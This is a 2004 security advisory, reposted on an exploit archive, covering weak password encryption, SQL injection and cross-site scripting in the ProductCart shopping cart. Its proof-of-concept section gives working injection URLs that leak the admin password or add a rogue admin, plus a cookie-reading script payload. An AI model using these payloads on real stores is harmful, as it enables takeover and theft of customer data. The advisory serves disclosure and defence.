exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Adv-20040216.txt

Adv-20040216.txt
Posted Feb 18, 2004
Authored by Nick Gudov | Site s-quadra.com

S-Quadra Advisory #2004-02-16 - EarlyImpact ProductCart shopping cart software incorrectly makes use of cryptography, is susceptible to a cross site scripting attack, and allows for SQL injection attacks as well.

tags | exploit, xss, sql injection
SHA-256 | 3330d8b93aad8afb29f6c2680fb973686c8aec2837cc6efd89d60eb6b3d896ca

Adv-20040216.txt

Change Mirror Download
      S-Quadra Advisory #2004-02-16

Topic: EarlyImpact ProductCart shopping cart software multiple security
vulnerabilities
Severity: High
Vendor URL: https://www.earlyimpact.com
Advisory URL: https://www.s-quadra.com/advisories/Adv-20040216.txt
Release date: 16 Feb 2004

1. DESCRIPTION

ProductCart is a shopping cart application for e-commerce enabled
sites. Its written on ASP, works on most Windows platforms and uses MS
Access or MS SQL Server as a backend. Please visit
https://www.earlyimpact.com for information about ProductCart shopping cart.

2. DETAILS

-- Vulnerability 1: Incorrect use of cryptography

ProductCart software uses stream cipher algorithm (possibly RC4) to
encrypt various passwords before storing them in a database. A stream
cipher generates a keystream (a sequence of bits used as a key).
Encryption is accomplished by combining the keystream with the plaintext
with the bitwise XOR operation. The generation of the keystream is
independent of the plaintext and ciphertext. In ProductCart the single
cryptographic key used to encrypt all customers and store administrator
passwords so it's possible for an attacker to perform a choosen
plaintext attack and obtain first 100 bytes of keystream (maximum length
of customer password). Using this bytes an attacker can decrypt any
encrypted information from the database including store administrator
password.

-- Vulnerability 2: SQL Injection vulnerability

An SQL Injection vulnerability has been found in the 'advSearch_h.asp'
script.

Inproper use of user supplied input filters allows an attacker to
modify SQL query and perform some kinds of SQL injection attacks.

Successfull exploitation of this vulnerability could allow an attacker
to gain administrative access to ProductCart store and read any
information from store database (i.e. customers private data). Also an
attacker could execute arbitrary commands using xp_cmdshell function.

-- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp'

By injecting specially crafted javascript code in url and tricking a
user to visit it a remote attacker can steal user session id and gain
access to user's personal data.

-- PoC code

--Vulnerability 1 and 2:

Platform: MS SQL Server as a backend
ProductCart software incorrect uses cryptographic algorithms to protect
store administrator password. Combination of this error and SQL
injection vulnerability allow an attacker to gain administrative access
to store.

Performing following scenarion an attaker can find the store
administrator username and password.

Scenario:

1. An attacker register new customer in store. Let the value of field
'Postal Code' in the registration form will be equal to '987654' and an
attacker must select long password (it should be longer then the store
administrator password).

2. An attacker performs the following request

https://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&



3. An attacker goes to https://[target]/productcart/pc/Custmoda.asp
and reads his personal information. The value of the "FirstName" field
in this form will be store administrator login name. Store administrator
password is easy to find by this formula:

adminpass = (Last Name) xor (Phone) xor (customer login password from
scenario step 1)

In the following scenario an attacker can add a new administrator to store

Scenario:

1. An attacker register new customer in store. Let the value of 'First
Name' field in registration form will be equal to
'1*2*3*4*5*6*7*8*9*10*', the value of 'Last Name ' field will be equal
to '34567', the value of 'Password' field will be equal to '111' and the
value of 'Postal Code' field will be equal to '987654'.

2. An attacker performs the following request:

https://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&



3. An attacker logs into the store admin interface with username
'34567' and password '111'.

-- Vulnerability 3:

https://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"



3. FIX INFORMATION

S-Quadra alerted EarlyImpact development team to this issue on 29th
January 2004.

4. CREDITS

Nick Gudov <cipher@s-quadra.com> is responsible for discovering this
issue.

5. ABOUT

S-Quadra offers services in computer security, penetration testing and
network assesment, web application security, source code review and
third party product vulnerability assesment, forensic support and
reverse engineering.

S-Quadra Advisory #2004-02-16
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close